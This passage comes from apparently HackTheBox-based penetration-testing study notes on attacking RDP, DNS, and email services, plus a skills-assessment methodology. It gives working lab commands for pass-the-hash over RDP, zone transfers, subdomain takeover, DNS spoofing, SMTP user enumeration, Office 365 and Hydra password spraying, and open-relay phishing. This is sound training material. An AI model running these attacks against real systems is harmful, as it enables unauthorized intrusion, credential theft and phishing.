    487 C:\htb> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
    488 ```
    489 ```bash
    490 xfreerdp /v:192.168.220.152 /u:lewen /pth:300FF5E89EF33F83A8146C10F5AB9BB9
    491 ```
    492 
    493 **BlueKeep (CVE-2019-0708)** — concept only. Attacker-manipulated data during the RDP virtual-channel settings exchange (Source) triggers a Use-After-Free in a kernel function running as `LocalSystem` (Process/Privileges), and the trigger cycle writes and executes attacker instructions in the freed memory for network RCE (Destination).
    494 
    495 > [!warning] Stability risk
    496 > BlueKeep can crash the target with a BSOD and has caused real instability in the wild. For labs, Metasploit's `rdp_scanner` aux and `cve_2019_0708_bluekeep_rce` modules are the vetted route. Against anything a client cares about, get explicit sign-off before firing.
    497 
    498 ---
    499 
    500 ## 9 · Attacking DNS `fas:Terminal` — UDP/53, TCP/53
    501 
    502 DNS underpins nearly every network application, which makes it a consistently high-value surface. Three distinct vectors here have very different reach: zone transfer and subdomain takeover are remotely exploitable; DNS spoofing needs local L2 adjacency.
    503 
    504 **Zone transfer (AXFR).** A zone transfer copies a chunk of the DNS database for replication and requires no auth by protocol design. A server that permits AXFR from any client leaks its entire internal namespace in one request:
    505 
    506 ```bash
    507 nmap -p53 -Pn -sV -sC 10.10.110.213           # 53/tcp open domain ISC BIND 9.11.3
    508 dig AXFR @ns1.inlanefreight.htb inlanefreight.htb
    509 #  admin.inlanefreight.htb.  IN A 10.129.110.21
    510 #  hr.inlanefreight.htb.     IN A 10.129.110.25   ← internal hostnames + IP scheme, unauthenticated
    511 fierce --domain zonetransfer.me                # automates AXFR across every discovered NS
    512 ```
    513 
    514 **Subdomain enumeration → takeover.** A `CNAME` pointing at a deleted/expired third-party resource (an S3 bucket, a CDN endpoint) leaves the subdomain "dangling." Claim that resource and you control what the trusted subdomain serves — without ever touching the target's own DNS:
    515 
    516 ```bash
    517 ./subfinder -d inlanefreight.com -v            # passive, OSINT-sourced — fast and quiet
    518 host support.inlanefreight.com
    519 #  is an alias for inlanefreight.s3.amazonaws.com   → visiting returns AWS "NoSuchBucket"
    520 #  register an S3 bucket named 'inlanefreight' ⇒ takeover
    521 ```
    522 
    523 Check every third-party-hosted CNAME against **`can-i-take-over-xyz`** (catalogues which providers are currently vulnerable and how to claim each), or automate detection with **Nuclei**'s `subdomain-takeover` templates. Run passive enumeration (Subfinder) before active brute force (Subbrute/Sublist3r).
    524 
    525 **Local DNS spoofing (Ettercap / Bettercap).** Strictly L2-adjacent, unlike the two vectors above. Poison the answer, then ARP-spoof yourself into the path:
    526 
    527 ```bash
    528 cat /etc/ettercap/etter.dns
    529 #  inlanefreight.com    A  192.168.225.110
    530 #  *.inlanefreight.com  A  192.168.225.110
    531 #  Ettercap: Hosts > Scan for Hosts → set victim=Target1, gateway=Target2 → Plugins > dns_spoof
    532 ```
    533 
    534 **Bettercap** is the maintained, more scriptable successor to Ettercap and worth defaulting to for MITM/spoofing work.
    535 
    536 ---
    537 
    538 ## 10 · Attacking email services `fas:Terminal` — SMTP 25/465/587 · POP3 110/995 · IMAP 143/993
    539 
    540 Email needs at least two protocols — SMTP for sending, POP3/IMAP for retrieval — and increasingly a cloud provider in front of both. The MX record decides the entire approach that follows.
    541 
    542 <figure class="flow plate corners">
    543   <figcaption class="flow__cap"><span class="flow__kind">MX record decides the path</span><span class="flow__dir">TD</span></figcaption>
    544   <div class="flow__body">
    545     <div class="flow__diagram" data-dir="td">
    546       <div class="flow-rank"><div class="flow-node is-entry">dig/host MX record</div></div>
    547       <div class="flow-edge"></div>
    548       <div class="flow-rank"><div class="flow-node is-decision">Cloud provider or self-hosted?</div></div>
    549       <div class="flow-branches">
    550         <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">self-hosted</span></div><div class="flow-node">nmap 25,110,143,465,587,993,995<span class="sub">VRFY/EXPN/RCPT · USER · open relay</span></div></div>
    551         <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">Office 365</span></div><div class="flow-node">o365spray --validate → --enum → --spray<span class="sub">purpose-built, lockout-aware</span></div></div>
    552       </div>
    553       <div class="flow-join"></div>
    554       <div class="flow-rank"><div class="flow-node is-goal">Mailbox access → search for 'password'</div></div>
    555     </div>
    556   </div>
    557 </figure>
    558 
    559 > [!info] MX reconnaissance first
    560 > The MX record identifies who handles the domain's mail — Microsoft 365 (`*.mail.protection.outlook.com`), G-Suite (`aspmx.l.google.com`), Zoho (`mx.zoho.com`), or a self-hosted server. Each needs a completely different enumeration approach, so resolve it before anything else.
    561 
    562 **MX + port enumeration:**
    563 
    564 ```bash
    565 host -t MX hackthebox.eu                        # aspmx.l.google.com  → cloud (G-Suite)
    566 dig mx inlanefreight.com | grep MX | grep -v ';'
    567 host -t A mail1.inlanefreight.htb.              # resolve the mail host, then scan it
    568 sudo nmap -Pn -sV -sC -p25,143,110,465,587,993,995 10.129.14.128
    569 #  25/tcp smtp Postfix smtpd · smtp-commands: ... VRFY ...   ← VRFY present ⇒ user enum worth trying
    570 ```
    571 
    572 **Manual SMTP username enumeration.** Three independent primitives — disabling one (commonly `VRFY`) doesn't close the others, so test all three:
    573 
    574 ```bash
    575 telnet 10.10.110.20 25
    576 VRFY root                         # 252 = exists · 550 = unknown
    577 EXPN support-team                 # expands a distribution list into member addresses (bigger leak)
    578 MAIL FROM:john@inlanefreight.htb
    579 RCPT TO:john                      # 250 = recipient ok · 550 = user unknown (hard to disable)
    580 ```
    581 
    582 **POP3 user enumeration + automation:**
    583 
    584 ```bash
    585 telnet 10.10.110.20 110
    586 USER john                         # +OK = valid · -ERR = invalid
    587 smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7
    588 #  john@inlanefreight.htb exists
    589 ```
    590 
    591 **Office 365 enumeration and spraying.** Generic tools are blocked by Microsoft's throttling — use a purpose-built tool that respects lockout, and keep it current as MS changes endpoint behaviour:
    592 
    593 ```bash
    594 python3 o365spray.py --validate --domain msplaintext.xyz        # is this domain even O365?
    595 python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz   # valid accounts, no password needed
    596 python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz
    597 #  [VALID] julio@msplaintext.xyz:March2022!
    598 ```
    599 
    600 **Password attacks against self-hosted mail (Hydra).** `-L users -p 'password'` sprays; swap the module name for `smtp`/`imap`:
    601 
    602 ```bash
    603 hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3
    604 #  [110][pop3] login: john  password: Company01!
    605 ```
    606 
    607 **Open relay abuse.** A relay that forwards mail from arbitrary sources without auth lets you send *as* any internal address — a phishing-as-trusted-sender capability, not just info disclosure:
    608 
    609 ```bash
    610 nmap -p25 -Pn --script smtp-open-relay 10.10.11.213      # Server is an open relay (14/16 tests)
    611 swaks --from admin@company.com --to john@company.com \
    612       --header 'Subject: Company Notification' \
    613       --body 'Please complete this survey: http://phish/' --server 10.10.11.213
    614 ```
    615 
    616 **OpenSMTPD RCE (CVE-2020-7247)** — concept only. Unauthenticated input during SMTP session composition (Source) is misparsed by OpenSMTPD's sender-field handler, which treats a `;` as a delimiter into shell execution rather than terminating the address (Process). Because OpenSMTPD binds a standardised port it runs as root (Privileges), so the smuggled 64-char-limited command executes as root and shells back out (Destination) — a clean reminder that a simple parsing bug in a root-owned, standard-port daemon is full unauthenticated RCE.
    617 
    618 ---
    619 
    620 ## 11 · Skills assessment `fas:Terminal`
    621 
    622 The module closes with three Inlanefreight servers — Easy, Medium, Hard — each hiding an `HTB{...}` flag and requiring the whole module's toolkit against a target with no hints beyond a short business description. None of the three needs a novel technique; the assessment is proof the per-service checklists and the Concept-of-Attacks model generalise.
    623 
    624 > [!info] Scenario briefs (read them like a scoping doc)
    625 > - **Easy** — "manages emails, customers, and their files" → email + file share (SMB/FTP) enumeration first.
    626 > - **Medium** — an internal `inlanefreight.htb` host that "stores emails and files... used relatively rarely... only for testing" → a probably-under-hardened box; prioritise default/test credentials.
    627 > - **Hard** — an internal file/working-material server that also runs "a database... the purpose of which we do not know" → file-share enumeration chained into an unknown SQL database via credential reuse.
    628 
    629 **Methodology for all three** — the brief itself is reconnaissance:
    630 
    631 ```bash
    632 sudo nmap -p- -sV -sC -T4 <TARGET_IP> -oN full_scan.txt
    633 ```
    634 
    635 - `-p-` scans all 65535 ports, not the default top-1000 — non-negotiable on "internal / rarely used" hosts that frequently run services on non-standard ports.
    636 - Then work each open port through its section above, **anonymous/null access first** (it's free), then default/weak creds, then known misconfigs, then version CVEs.
    637 
    638 | Port | Apply |
    639 |---|---|
    640 | 21 (FTP) | §5 — anonymous login, brute force, CVEs |
    641 | 139/445 (SMB) | §6 — null session, `smbclient -L`, `smbmap`, spray |
    642 | 1433/3306 (SQL) | §7 — default/weak creds, `xp_cmdshell`, file r/w |
    643 | 3389 (RDP) | §8 — spray, PtH if a hash is available |
    644 | 53 (DNS) | §9 — zone transfer, subdomain enumeration |
    645 | 25/110/143 (Mail) | §10 — user enumeration, open relay, spray |
    646 
    647 **The connective tissue is credential reuse.** One confirmed credential set is worth testing against *every* discovered service immediately — `nxc`/`crackmapexec` share the same `-u`/`-p` syntax across `smb`, `mssql`, `ftp`, `ssh`, which is exactly what the Hard scenario (file server → unknown database) is built to test.
    648 
    649 ---
    650 
    651 ## Cross-service chaining — the whole point `fas:Lightbulb`
    652 
    653 Individually, none of these services is a "vulnerability." Their value is how they chain:
    654 
    655 1. **Anonymous/null first, everywhere.** FTP `ftp-anon`, SMB `-N`, mailbox `USER` probes — cheap, fast, non-destructive, and frequently the entire foothold.
    656 2. **Everything is a candidate credential.** An empty filename, a config value, a mailbox string, a connection string in a binary → test it as a username *and* a password against every other service.
    657 3. **Misconfig before CVE.** Default creds, anonymous auth, and exposed management interfaces land more boxes than memory-corruption bugs. Check them first.
    658 4. **Hashes are as good as passwords.** A dumped SAM hash or a Responder-captured NetNTLMv2 is immediately actionable via Pass-the-Hash or relay — cracking is a bonus, not a requirement.
    659 5. **Signing and lockout are the two flags to note during enumeration** — SMB `smb2-security-mode` decides whether relay is on the table; the account lockout policy decides how aggressively you can spray.
    660 
    661 ---
    662 
    663 ## References & sources `fas:BookOpen`
    664 
    665 Distilled from the HackTheBox Academy **Attacking Common Services** module (CPTS path, module 11) and field-tested tooling notes.
    666 
    667 1. [OWASP Top 10 · A05:2021 Security Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration/)
    668 2. [CVE-2022-22836 · CoreFTP arbitrary file write](https://nvd.nist.gov/vuln/detail/CVE-2022-22836)
    669 3. [CVE-2020-0796 · SMBGhost](https://nvd.nist.gov/vuln/detail/CVE-2020-0796)
    670 4. [CVE-2019-0708 · BlueKeep](https://nvd.nist.gov/vuln/detail/CVE-2019-0708)
    671 5. [CVE-2020-7247 · OpenSMTPD RCE](https://nvd.nist.gov/vuln/detail/CVE-2020-7247)
    672 6. [CVE-2021-44228 · Log4Shell](https://nvd.nist.gov/vuln/detail/CVE-2021-44228)
    673 7. [can-i-take-over-xyz · subdomain takeover reference](https://github.com/EdOverflow/can-i-take-over-xyz)
    674 8. [Microsoft · xp_cmdshell (Transact-SQL)](https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql)
    675 9. [NetExec (nxc) · documentation](https://www.netexec.wiki/)
    676 10. [Impacket · Fortra/impacket](https://github.com/fortra/impacket)
    677 
    678 > [!navigation] Keep going
    679 > **Condensed card:** Attacking Common Services cheat sheet · **Field manual:** [Network Service Attack Manual](/sheets/pentest-workflow/network-service-attack-manual) · **Applications:** [Attacking Common Applications guide](/sheets/pentest-workflow/attacking-common-applications-guide) · **Credentials:** [Password Attacks & Credential Hunting](/sheets/pentest-workflow/password-attacks-and-credential-hunting) · **Dashboard:** [CPTS Workflow](/sheets/pentest-workflow/attack-flow-dashboard)